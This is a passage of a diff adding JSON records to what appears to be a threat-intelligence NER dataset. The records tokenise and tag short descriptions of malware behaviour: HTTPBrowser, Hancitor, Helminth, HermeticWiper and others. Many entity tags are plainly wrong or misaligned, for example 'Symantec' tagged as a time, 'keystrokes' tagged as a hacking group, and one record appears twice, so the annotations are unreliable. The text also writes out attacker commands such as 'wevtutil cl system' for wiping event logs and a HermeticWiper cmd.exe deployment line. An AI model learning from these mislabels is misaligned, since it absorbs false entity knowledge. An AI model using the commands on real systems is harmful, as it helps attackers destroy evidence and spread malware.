"O" + ] + }, + { + "tokens": [ + "HTRAN", + "can", + "proxy", + "TCP", + "socket", + "connections", + "to", + "obfuscate", + "command", + "and", + "control", + "infrastructure." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTRAN", + "can", + "install", + "a", + "rootkit", + "to", + "hide", + "network", + "connections", + "from", + "the", + "host", + "OS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "abuses", + "the", + "Windows", + "DLL", + "load", + "order", + "by", + "using", + "a", + "legitimate", + "Symantec", + "anti-virus", + "binary,", + "VPDN_LU.exe,", + "to", + "load", + "a", + "malicious", + "DLL", + "that", + "mimics", + "a", + "legitimate", + "Symantec", + "DLL,", + "navlu.dll." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "B-SamFile" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "has", + "used", + "DLL", + "side-loading." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "has", + "used", + "DNS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "deletes", + "its", + "original", + "installer", + "file", + "once", + "installation", + "is", + "complete." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "is", + "capable", + "of", + "listing", + "files,", + "folders,", + "and", + "drives", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "is", + "capable", + "of", + "writing", + "a", + "file", + "to", + "the", + "compromised", + "system", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "is", + "capable", + "of", + "capturing", + "keystrokes", + "on", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser's", + "installer", + "contains", + "a", + "malicious", + "file", + "named", + "navlu.dll", + "to", + "decrypt", + "and", + "run", + "the", + "RAT.", + "navlu.dll", + "is", + "also", + "the", + "name", + "of", + "a", + "legitimate", + "Symantec", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "HTTPBrowser's", + "code", + "may", + "be", + "obfuscated", + "through", + "structured", + "exception", + "handling", + "and", + "return-oriented", + "programming." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "has", + "established", + "persistence", + "by", + "setting", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "key", + "value", + "for", + "<code>wdm</code>", + "to", + "the", + "path", + "of", + "the", + "executable.", + "It", + "has", + "also", + "used", + "the", + "Registry", + "entry", + "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "vpdn", + "“%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe”</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPBrowser", + "is", + "capable", + "of", + "spawning", + "a", + "reverse", + "shell", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HUI", + "Loader", + "can", + "be", + "deployed", + "to", + "targeted", + "systems", + "via", + "legitimate", + "programs", + "that", + "are", + "vulnerable", + "to", + "DLL", + "search", + "order", + "hijacking." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "HUI", + "Loader", + "can", + "decrypt", + "and", + "load", + "files", + "containing", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HUI", + "Loader", + "has", + "the", + "ability", + "to", + "disable", + "Windows", + "Event", + "Tracing", + "for", + "Windows", + "(ETW)", + "and", + "Antimalware", + "Scan", + "Interface", + "(AMSI)", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hacking", + "Team", + "UEFI", + "Rootkit", + "is", + "a", + "UEFI", + "BIOS", + "rootkit", + "developed", + "by", + "the", + "company", + "Hacking", + "Team", + "to", + "persist", + "remote", + "access", + "software", + "on", + "some", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hacking", + "Team", + "UEFI", + "Rootkit", + "is", + "a", + "UEFI", + "BIOS", + "rootkit", + "developed", + "by", + "the", + "company", + "Hacking", + "Team", + "to", + "persist", + "remote", + "access", + "software", + "on", + "some", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "decoded", + "Base64", + "encoded", + "URLs", + "to", + "insert", + "a", + "recipient’s", + "name", + "into", + "the", + "filename", + "of", + "the", + "Word", + "document.", + "Hancitor", + "has", + "also", + "extracted", + "executables", + "from", + "ZIP", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "deleted", + "files", + "using", + "the", + "VBA", + "<code>kill</code>", + "function." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "the", + "ability", + "to", + "download", + "additional", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "malicious", + "Microsoft", + "Word", + "documents,", + "sent", + "via", + "email,", + "which", + "prompted", + "the", + "victim", + "to", + "enable", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "link", + "delivered", + "through", + "phishing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "<code>CallWindowProc</code>", + "and", + "<code>EnumResourceTypesA</code>", + "to", + "interpret", + "and", + "execute", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "Base64", + "to", + "encode", + "malicious", + "links.", + "Hancitor", + "has", + "also", + "delivered", + "compressed", + "payloads", + "in", + "ZIP", + "files", + "to", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "PowerShell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "added", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "been", + "delivered", + "via", + "phishing", + "emails", + "with", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "been", + "delivered", + "via", + "phishing", + "emails", + "which", + "contained", + "malicious", + "links." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "verclsid.exe", + "to", + "download", + "and", + "execute", + "a", + "malicious", + "script." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hancitor", + "has", + "used", + "a", + "macro", + "to", + "check", + "that", + "an", + "ActiveDocument", + "shape", + "object", + "in", + "the", + "lure", + "message", + "is", + "present.", + "If", + "this", + "object", + "is", + "not", + "found,", + "the", + "macro", + "will", + "exit", + "without", + "downloading", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Havij", + "is", + "used", + "to", + "automate", + "SQL", + "injection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "A", + "Helminth", + "VBScript", + "receives", + "a", + "batch", + "script", + "to", + "execute", + "a", + "set", + "of", + "commands", + "in", + "a", + "command", + "prompt." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "executable", + "version", + "of", + "Helminth", + "has", + "a", + "module", + "to", + "log", + "clipboard", + "contents." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "samples", + "have", + "been", + "signed", + "with", + "legitimate,", + "compromised", + "code", + "signing", + "certificates", + "owned", + "by", + "software", + "company", + "AI", + "Squared." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Helminth", + "can", + "use", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "splits", + "data", + "into", + "chunks", + "up", + "to", + "23", + "bytes", + "and", + "sends", + "the", + "data", + "in", + "DNS", + "queries", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "has", + "checked", + "for", + "the", + "domain", + "admin", + "group", + "and", + "Exchange", + "Trusted", + "Subsystem", + "groups", + "using", + "the", + "commands", + "<code>net", + "group", + "Exchange", + "Trusted", + "Subsystem", + "/domain</code>", + "and", + "<code>net", + "group", + "domain", + "admins", + "/domain</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Helminth", + "config", + "file", + "is", + "encrypted", + "with", + "RC4." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "can", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "executable", + "version", + "of", + "Helminth", + "has", + "a", + "module", + "to", + "log", + "keystrokes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "creates", + "folders", + "to", + "store", + "output", + "from", + "batch", + "scripts", + "prior", + "to", + "sending", + "the", + "information", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "has", + "checked", + "the", + "local", + "administrators", + "group." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "version", + "of", + "Helminth", + "uses", + "a", + "PowerShell", + "script." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Helminth", + "has", + "used", + "Tasklist", + "to", + "get", + "information", + "on", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "establishes", + "persistence", + "by", + "creating", + "a", + "shortcut", + "in", + "the", + "Start", + "Menu", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "has", + "used", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "establishes", + "persistence", + "by", + "creating", + "a", + "shortcut." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C2", + "over", + "HTTP,", + "Helminth", + "encodes", + "data", + "with", + "base64", + "and", + "sends", + "it", + "via", + "the", + "\"Cookie\"", + "field", + "of", + "HTTP", + "requests.", + "For", + "C2", + "over", + "DNS,", + "Helminth", + "converts", + "ASCII", + "characters", + "into", + "their", + "hexadecimal", + "values", + "and", + "sends", + "the", + "data", + "in", + "cleartext." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "encrypts", + "data", + "sent", + "to", + "its", + "C2", + "server", + "over", + "HTTP", + "with", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "version", + "of", + "Helminth", + "consists", + "of", + "VBScript", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "can", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Helminth", + "can", + "provide", + "a", + "remote", + "shell.", + "One", + "version", + "of", + "Helminth", + "uses", + "batch", + "scripting." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "use", + "`AdjustTokenPrivileges`", + "to", + "grant", + "itself", + "privileges", + "for", + "debugging", + "with", + "`SeDebugPrivilege`,", + "creating", + "backups", + "with", + "`SeBackupPrivilege`,", + "loading", + "drivers", + "with", + "`SeLoadDriverPrivilege`,", + "and", + "shutting", + "down", + "a", + "local", + "system", + "with", + "`SeShutdownPrivilege`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "overwrite", + "the", + "`C:\\Windows\\System32\\winevt\\Logs`", + "file", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "HermeticWiper", + "executable", + "has", + "been", + "signed", + "with", + "a", + "legitimate", + "certificate", + "issued", + "to", + "Hermetica", + "Digital", + "Ltd." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "recursively", + "wipe", + "folders", + "and", + "files", + "in", + "`Windows`,", + "`Program", + "Files`,", + "`Program", + "Files(x86)`,", + "`PerfLogs`,", + "`Boot,", + "System`,", + "`Volume", + "Information`,", + "and", + "`AppData`", + "folders", + "using", + "`FSCTL_MOVE_FILE`.", + "HermeticWiper", + "can", + "also", + "overwrite", + "symbolic", + "links", + "and", + "big", + "files", + "in", + "`My", + "Documents`", + "and", + "on", + "the", + "Desktop", + "with", + "random", + "bytes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "decompress", + "and", + "copy", + "driver", + "files", + "using", + "`LZCopy`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "corrupt", + "disk", + "partitions", + "and", + "obtain", + "raw", + "disk", + "access", + "to", + "destroy", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "corrupt", + "disk", + "partitions,", + "damage", + "the", + "Master", + "Boot", + "Record", + "(MBR),", + "and", + "overwrite", + "the", + "Master", + "File", + "Table", + "(MFT)", + "of", + "all", + "available", + "physical", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "compress", + "32-bit", + "and", + "64-bit", + "driver", + "files", + "with", + "the", + "Lempel-Ziv", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "overwrite", + "its", + "own", + "file", + "with", + "random", + "bites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "enumerate", + "common", + "folders", + "such", + "as", + "My", + "Documents,", + "Desktop,", + "and", + "AppData." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "deploy", + "through", + "an", + "infected", + "system's", + "default", + "domain", + "policy." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "set", + "the", + "`HKLM:\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl\\CrashDumpEnabled`", + "Registry", + "key", + "to", + "`0`", + "in", + "order", + "to", + "disable", + "crash", + "dumps." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "disable", + "pop-up", + "information", + "about", + "folders", + "and", + "desktop", + "items", + "and", + "delete", + "Registry", + "keys", + "to", + "hide", + "malicious", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "disable", + "the", + "VSS", + "service", + "on", + "a", + "compromised", + "host", + "using", + "the", + "service", + "control", + "manager." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "used", + "the", + "name", + "`postgressql.exe`", + "to", + "mask", + "a", + "malicious", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "modify", + "Registry", + "keys", + "to", + "disable", + "crash", + "dumps,", + "colors", + "for", + "compressed", + "files,", + "and", + "pop-up", + "information", + "about", + "folders", + "and", + "desktop", + "items." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "call", + "multiple", + "Windows", + "API", + "functions", + "used", + "for", + "privilege", + "escalation,", + "service", + "execution,", + "and", + "to", + "overwrite", + "random", + "bites", + "of", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "use", + "scheduled", + "tasks", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "create", + "system", + "services", + "to", + "aid", + "in", + "executing", + "the", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "stop", + "the", + "Volume", + "Shadow", + "Copy", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "determine", + "the", + "OS", + "version,", + "bitness,", + "and", + "enumerate", + "physical", + "drives", + "on", + "a", + "targeted", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "initiate", + "a", + "system", + "shutdown." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "has", + "the", + "ability", + "to", + "receive", + "a", + "command", + "parameter", + "to", + "sleep", + "prior", + "to", + "carrying", + "out", + "destructive", + "actions", + "on", + "a", + "targeted", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "use", + "`cmd.exe", + "/Q/c", + "move", + "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1", + "CSIDL_WINDOWS\\policydefinitions\\postgresql.exe", + "1>", + "\\\\127.0.0.1\\ADMIN$\\_1636727589.6007507", + "2>&1`", + "to", + "deploy", + "on", + "an", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWiper", + "can", + "load", + "drivers", + "by", + "creating", + "a", + "new", + "service", + "using", + "the", + "`CreateServiceW`", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "the", + "ability", + "to", + "use", + "`wevtutil", + "cl", + "system`", + "to", + "clear", + "event", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "been", + "signed", + "by", + "valid", + "certificates", + "assigned", + "to", + "Hermetica", + "Digital." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "execute", + "files", + "on", + "remote", + "machines", + "using", + "DCOM." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "the", + "ability", + "to", + "encrypt", + "PE", + "files", + "with", + "a", + "reverse", + "XOR", + "loop." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "copy", + "files", + "to", + "other", + "machines", + "on", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "been", + 